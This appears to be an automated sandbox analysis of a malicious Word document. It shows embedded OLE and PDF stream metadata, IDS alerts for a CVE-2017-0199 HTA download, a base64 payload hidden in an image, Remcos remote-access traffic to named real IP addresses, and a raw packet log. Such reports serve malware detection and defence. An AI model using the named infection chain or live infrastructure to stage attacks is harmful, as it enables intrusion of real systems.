                                                                                                                                                                        File Content Preview:PK.........jWYs"P)............[Content_Types].xmlUT......g...g...g.V.N.0.._....E.[...j.....n.......d.....7.B..B....9.1s.vF..k...I{W.a5`.8..v..=Ln.sV$.N....l..]....&... .K5.#...'9.+R..8Zi|...5.x..I.....g\z........;2....^D...t....7.....":V\..,]3...R ../N}.-
                                                                                                                                                                        Icon Hash:2764a3aaaeb7bdbf
                                                                                                                                                                        Document Type:OpenXML
                                                                                                                                                                        Number of OLE Files:3
                                                                                                                                                                        Has Summary Info:
                                                                                                                                                                        Application Name:
                                                                                                                                                                        Encrypted Document:False
                                                                                                                                                                        Contains Word Document Stream:True
                                                                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                                                                        Contains Visio Document Stream:False
                                                                                                                                                                        Contains ObjectPool Stream:False
                                                                                                                                                                        Flash Objects Count:0
                                                                                                                                                                        Contains VBA Macros:False
                                                                                                                                                                        Title:
                                                                                                                                                                        Subject:
                                                                                                                                                                        Author:91974
                                                                                                                                                                        Keywords:
                                                                                                                                                                        Template:Normal.dotm
                                                                                                                                                                        Last Saved By:91974
                                                                                                                                                                        Revion Number:2
                                                                                                                                                                        Total Edit Time:1
                                                                                                                                                                        Create Time:2024-10-23T07:48:00Z
                                                                                                                                                                        Last Saved Time:2024-10-23T07:49:00Z
                                                                                                                                                                        Number of Pages:1
                                                                                                                                                                        Number of Words:0
                                                                                                                                                                        Number of Characters:0
                                                                                                                                                                        Creating Application:Microsoft Office Word
                                                                                                                                                                        Security:0
                                                                                                                                                                        Number of Lines:1
                                                                                                                                                                        Number of Paragraphs:1
                                                                                                                                                                        Thumbnail Scaling Desired:false
                                                                                                                                                                        Company:Grizli777
                                                                                                                                                                        Contains Dirty Links:false
                                                                                                                                                                        Shared Document:false
                                                                                                                                                                        Changed Hyperlinks:false
                                                                                                                                                                        Application Version:12.0000
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x1CompObj
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:94
                                                                                                                                                                        Entropy:4.345966460061678
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x1Ole
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:20
                                                                                                                                                                        Entropy:0.5689955935892812
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x3EPRINT
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                        Stream Size:1505804
                                                                                                                                                                        Entropy:0.7675459840560199
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        Data ASCII:. . . . l . . . . . . . . . . . R . . . I . . . . . . . . . . . ) . . . ; . . E M F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . X . . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . ; . . . . . . . . . . S . . . J . . . Q . . . P . . . . . . . . . . R . . . I . . . . . . . . . . . . . . . . . . . S . . . J . . . P . . . ( . . . x . . . . . . . . . . . ) . . . ; . . ( . . . S . . . J . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:01 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 52 02 00 00 49 03 00 00 00 00 00 00 00 00 00 00 a4 29 00 00 14 3b 00 00 20 45 4d 46 00 00 01 00 0c fa 16 00 07 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 00 38 04 00 00 58 01 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3f 05 00 d0 f5 02 00 11 00 00 00 0c 00 00 00 08 00 00 00 0a 00 00 00 10 00 00 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x3ObjInfo
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:6
                                                                                                                                                                        Entropy:1.2516291673878228
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . .
                                                                                                                                                                        Data Raw:00 00 03 00 0d 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:CONTENTS
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:PDF document, version 1.7, 1 pages
                                                                                                                                                                        Stream Size:56395
                                                                                                                                                                        Entropy:7.879183004467334
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        Data ASCII:% P D F - 1 . 7 . . 4 0 o b j . ( I d e n t i t y ) . e n d o b j . 5 0 o b j . ( A d o b e ) . e n d o b j . 8 0 o b j . < < . / F i l t e r / F l a t e D e c o d e . / L e n g t h 3 1 7 3 8 . / L e n g t h 1 4 0 2 7 6 0 . / T y p e / S t r e a m . > > . s t r e a m . x } . | \\ U 9 r % . I 2 Y & I I t . i i . $ ) P V v , H A _ ~ . . . / " L d u m = = s = . . A . ! ? * l X _ . . . } . . z . f , ^ > z 6 4 # / . \\ m 3 . . # { . l 8 . 0 } F . E . 6 o } . . ? a ? . k . . " . q . Z . [
                                                                                                                                                                        Data Raw:25 50 44 46 2d 31 2e 37 0a 0a 34 20 30 20 6f 62 6a 0a 28 49 64 65 6e 74 69 74 79 29 0a 65 6e 64 6f 62 6a 0a 35 20 30 20 6f 62 6a 0a 28 41 64 6f 62 65 29 0a 65 6e 64 6f 62 6a 0a 38 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 2f 4c 65 6e 67 74 68 20 33 31 37 33 38 0a 2f 4c 65 6e 67 74 68 31 20 34 30 32 37 36 30 0a 2f 54 79 70 65 20 2f
                                                                                                                                                                        Has Summary Info:
                                                                                                                                                                        Application Name:
                                                                                                                                                                        Encrypted Document:False
                                                                                                                                                                        Contains Word Document Stream:True
                                                                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                                                                        Contains Visio Document Stream:False
                                                                                                                                                                        Contains ObjectPool Stream:False
                                                                                                                                                                        Flash Objects Count:0
                                                                                                                                                                        Contains VBA Macros:False
                                                                                                                                                                        Title:
                                                                                                                                                                        Subject:
                                                                                                                                                                        Author:91974
                                                                                                                                                                        Keywords:
                                                                                                                                                                        Template:Normal.dotm
                                                                                                                                                                        Last Saved By:91974
                                                                                                                                                                        Revion Number:2
                                                                                                                                                                        Total Edit Time:1
                                                                                                                                                                        Create Time:2024-10-23T07:48:00Z
                                                                                                                                                                        Last Saved Time:2024-10-23T07:49:00Z
                                                                                                                                                                        Number of Pages:1
                                                                                                                                                                        Number of Words:0
                                                                                                                                                                        Number of Characters:0
                                                                                                                                                                        Creating Application:Microsoft Office Word
                                                                                                                                                                        Security:0
                                                                                                                                                                        Number of Lines:1
                                                                                                                                                                        Number of Paragraphs:1
                                                                                                                                                                        Thumbnail Scaling Desired:false
                                                                                                                                                                        Company:Grizli777
                                                                                                                                                                        Contains Dirty Links:false
                                                                                                                                                                        Shared Document:false
                                                                                                                                                                        Changed Hyperlinks:false
                                                                                                                                                                        Application Version:12.0000
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x1CompObj
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:94
                                                                                                                                                                        Entropy:4.345966460061678
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x1Ole
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:20
                                                                                                                                                                        Entropy:0.5689955935892812
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x3EPRINT
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                        Stream Size:1505804
                                                                                                                                                                        Entropy:1.5373625757766853
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        Data ASCII:. . . . l . . . . . . . . . . . R . . . I . . . . . . . . . . . ) . . . ; . . E M F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . X . . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . ; . . . . . . . . . . S . . . J . . . Q . . . P . . . . . . . . . . R . . . I . . . . . . . . . . . . . . . . . . . S . . . J . . . P . . . ( . . . x . . . . . . . . . . . ) . . . ; . . ( . . . S . . . J . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:01 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 52 02 00 00 49 03 00 00 00 00 00 00 00 00 00 00 a4 29 00 00 14 3b 00 00 20 45 4d 46 00 00 01 00 0c fa 16 00 07 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 00 38 04 00 00 58 01 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3f 05 00 d0 f5 02 00 11 00 00 00 0c 00 00 00 08 00 00 00 0a 00 00 00 10 00 00 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x3ObjInfo
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:6
                                                                                                                                                                        Entropy:1.2516291673878228
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . .
                                                                                                                                                                        Data Raw:00 00 03 00 0d 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:CONTENTS
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:PDF document, version 1.7, 1 pages (zip deflate encoded)
                                                                                                                                                                        Stream Size:120920
                                                                                                                                                                        Entropy:7.9803126267950475
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        Data ASCII:% P D F - 1 . 7 . . % . . 1 0 o b j . . < < / P a g e s 2 0 R / T y p e / C a t a l o g / V i e w e r P r e f e r e n c e s < < / N u m C o p i e s 1 / P i c k T r a y B y P D F S i z e t r u e / P r i n t S c a l i n g / N o n e > > > > . . e n d o b j . . 2 0 o b j . . < < / C o u n t 1 / K i d s [ 4 0 R ] / T y p e / P a g e s > > . . e n d o b j . . 3 0 o b j . . < < / C r e a t i o n D a t e ( D : 2 0 2 4 0 8 1 9 1 4 1 6 0 5 ) / C r e a t o r ( P D F i u m ) / P r o d
                                                                                                                                                                        Data Raw:25 50 44 46 2d 31 2e 37 0d 0a 25 a1 b3 c5 d7 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 50 61 67 65 73 20 32 20 30 20 52 20 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 3c 3c 2f 4e 75 6d 43 6f 70 69 65 73 20 31 2f 50 69 63 6b 54 72 61 79 42 79 50 44 46 53 69 7a 65 20 74 72 75 65 2f 50 72 69 6e 74 53 63 61 6c 69 6e 67 2f 4e 6f 6e 65 3e
                                                                                                                                                                        Has Summary Info:
                                                                                                                                                                        Application Name:
                                                                                                                                                                        Encrypted Document:False
                                                                                                                                                                        Contains Word Document Stream:True
                                                                                                                                                                        Contains Workbook/Book Stream:False
                                                                                                                                                                        Contains PowerPoint Document Stream:False
                                                                                                                                                                        Contains Visio Document Stream:False
                                                                                                                                                                        Contains ObjectPool Stream:False
                                                                                                                                                                        Flash Objects Count:0
                                                                                                                                                                        Contains VBA Macros:False
                                                                                                                                                                        Title:
                                                                                                                                                                        Subject:
                                                                                                                                                                        Author:91974
                                                                                                                                                                        Keywords:
                                                                                                                                                                        Template:Normal.dotm
                                                                                                                                                                        Last Saved By:91974
                                                                                                                                                                        Revion Number:2
                                                                                                                                                                        Total Edit Time:1
                                                                                                                                                                        Create Time:2024-10-23T07:48:00Z
                                                                                                                                                                        Last Saved Time:2024-10-23T07:49:00Z
                                                                                                                                                                        Number of Pages:1
                                                                                                                                                                        Number of Words:0
                                                                                                                                                                        Number of Characters:0
                                                                                                                                                                        Creating Application:Microsoft Office Word
                                                                                                                                                                        Security:0
                                                                                                                                                                        Number of Lines:1
                                                                                                                                                                        Number of Paragraphs:1
                                                                                                                                                                        Thumbnail Scaling Desired:false
                                                                                                                                                                        Company:Grizli777
                                                                                                                                                                        Contains Dirty Links:false
                                                                                                                                                                        Shared Document:false
                                                                                                                                                                        Changed Hyperlinks:false
                                                                                                                                                                        Application Version:12.0000
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x1CompObj
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:94
                                                                                                                                                                        Entropy:4.345966460061678
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x1Ole
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:20
                                                                                                                                                                        Entropy:0.5689955935892812
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x3EPRINT
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                        Stream Size:1504016
                                                                                                                                                                        Entropy:2.4398608801152193
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        Data ASCII:. . . . l . . . . . . . . . . . R . . . H . . . . . . . . . . . ) . . . ; . . E M F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . X . . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . ; . . . . . . . . . . S . . . I . . . Q . . . T . . . . . . . . . . R . . . H . . . . . . . . . . . . . . . . . . . S . . . I . . . P . . . ( . . . x . . . . . . . . . . . ) . . . ; . . ( . . . S . . . I . . . . . . . . . . . .
                                                                                                                                                                        Data Raw:01 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 52 02 00 00 48 03 00 00 00 00 00 00 00 00 00 00 a4 29 00 00 02 3b 00 00 20 45 4d 46 00 00 01 00 10 f3 16 00 07 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 00 38 04 00 00 58 01 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3f 05 00 d0 f5 02 00 11 00 00 00 0c 00 00 00 08 00 00 00 0a 00 00 00 10 00 00 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:\x3ObjInfo
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Stream Size:6
                                                                                                                                                                        Entropy:1.2516291673878228
                                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                                        Data ASCII:. . . . . .
                                                                                                                                                                        Data Raw:00 00 03 00 0d 00
                                                                                                                                                                        General
                                                                                                                                                                        Stream Path:CONTENTS
                                                                                                                                                                        CLSID:
                                                                                                                                                                        File Type:PDF document, version 1.7
                                                                                                                                                                        Stream Size:75331
                                                                                                                                                                        Entropy:7.9476003835705145
                                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                                        Data ASCII:% P D F - 1 . 7 . . % . . 1 0 o b j . . < < / R e s o u r c e s < < / C o l o r S p a c e < < / C S / D e v i c e R G B > > / X O b j e c t < < / i m g 0 3 0 R > > / P r o c S e t [ / P D F / T e x t / I m a g e B / I m a g e C / I m a g e I ] / F o n t < < / F 1 2 0 R / F 2 4 0 R > > > > / M e d i a B o x [ 0 0 5 9 5 8 4 1 ] / P a r e n t 6 0 R / T y p e / P a g e / C o n t e n t s 5 0 R / G r o u p < < / C S / D e v i c e R G B / S / T r a n s p a r e n c
                                                                                                                                                                        Data Raw:25 50 44 46 2d 31 2e 37 0d 0a 25 a1 b3 c5 d7 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 52 65 73 6f 75 72 63 65 73 20 3c 3c 2f 43 6f 6c 6f 72 53 70 61 63 65 20 3c 3c 2f 43 53 2f 44 65 76 69 63 65 52 47 42 3e 3e 2f 58 4f 62 6a 65 63 74 20 3c 3c 2f 69 6d 67 30 20 33 20 30 20 52 3e 3e 2f 50 72 6f 63 53 65 74 5b 2f 50 44 46 2f 54 65 78 74 2f 49 6d 61 67 65 42 2f 49 6d 61 67 65 43 2f 49
                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                        2024-10-23T17:26:32.377140+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.224916985.215.206.8280TCP
                                                                                                                                                                        2024-10-23T17:26:32.377165+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)185.215.206.8280192.168.2.2249169TCP
                                                                                                                                                                        2024-10-23T17:27:02.450167+02002049038ET MALWARE Malicious Base64 Encoded Payload In Image1216.58.212.129443192.168.2.2249172TCP
                                                                                                                                                                        2024-10-23T17:27:17.066409+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1185.215.206.8280192.168.2.2249173TCP
                                                                                                                                                                        2024-10-23T17:27:17.066409+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1185.215.206.8280192.168.2.2249173TCP
                                                                                                                                                                        2024-10-23T17:27:21.729864+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224917445.90.89.986498TCP
                                                                                                                                                                        2024-10-23T17:27:23.239085+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.2249176178.237.33.5080TCP
                                                                                                                                                                        2024-10-23T17:27:23.249980+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.224917545.90.89.986498TCP
                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Oct 23, 2024 17:26:12.933320999 CEST49161443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:12.933360100 CEST4434916124.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:12.933412075 CEST49161443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:12.942178965 CEST49161443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:12.942194939 CEST4434916124.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:13.634236097 CEST4434916124.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:13.634391069 CEST49161443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:13.639501095 CEST49161443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:13.639511108 CEST4434916124.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:13.639895916 CEST4434916124.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:13.639945030 CEST49161443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:14.069875956 CEST49161443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:14.115336895 CEST4434916124.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:14.235244036 CEST4434916124.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:14.235394001 CEST49161443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:14.235405922 CEST4434916124.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:14.235451937 CEST49161443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:14.235491037 CEST4434916124.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:14.235567093 CEST49161443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:14.512679100 CEST49161443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:14.512679100 CEST49161443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:14.512711048 CEST4434916124.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:14.512773037 CEST49161443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:14.962531090 CEST49162443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:14.962580919 CEST4434916224.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:14.962641954 CEST49162443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:14.963077068 CEST49162443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:14.963088036 CEST4434916224.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:15.657723904 CEST4434916224.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:15.657926083 CEST49162443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:15.662460089 CEST49162443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:15.662483931 CEST4434916224.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:15.662992001 CEST4434916224.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:15.668912888 CEST49162443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:15.711355925 CEST4434916224.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:15.839833021 CEST4434916224.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:15.839907885 CEST4434916224.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:15.840013981 CEST49162443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:15.840131998 CEST49162443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:15.840164900 CEST4434916224.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:15.840192080 CEST49162443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:15.840198040 CEST4434916224.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:19.178160906 CEST49163443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:19.178210020 CEST4434916324.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:19.178291082 CEST49163443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:19.179039001 CEST49163443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:19.179060936 CEST4434916324.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:19.868246078 CEST4434916324.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:19.868393898 CEST49163443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:19.886532068 CEST49163443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:19.886562109 CEST4434916324.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:19.886851072 CEST4434916324.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:19.988765001 CEST49163443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:20.035331011 CEST4434916324.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:20.154926062 CEST4434916324.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:20.155107975 CEST4434916324.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:20.155177116 CEST49163443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:20.164865017 CEST49163443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:20.164891958 CEST4434916324.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:20.381937981 CEST49164443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:20.381985903 CEST4434916424.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:20.382055044 CEST49164443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:20.382349014 CEST49164443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:20.382366896 CEST4434916424.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:21.088177919 CEST4434916424.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:21.088257074 CEST49164443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:21.092490911 CEST49164443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:21.092503071 CEST4434916424.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:21.092852116 CEST4434916424.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:21.093771935 CEST49164443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:21.135329008 CEST4434916424.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:21.262779951 CEST4434916424.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:21.262943029 CEST4434916424.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:21.263000011 CEST49164443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:21.263526917 CEST49164443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:21.263545990 CEST4434916424.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:21.276829004 CEST49165443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:21.276868105 CEST4434916524.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:21.276923895 CEST49165443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:21.277143002 CEST49165443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:21.277151108 CEST4434916524.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:22.102916002 CEST4434916524.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:22.103487968 CEST49165443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:22.103513002 CEST4434916524.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:22.104166985 CEST49165443192.168.2.2224.199.88.84
                                                                                                                                                                        Oct 23, 2024 17:26:22.104178905 CEST4434916524.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:22.272665977 CEST4434916524.199.88.84192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:22.272906065 CEST49165443192.168.2.2224.199.88.84
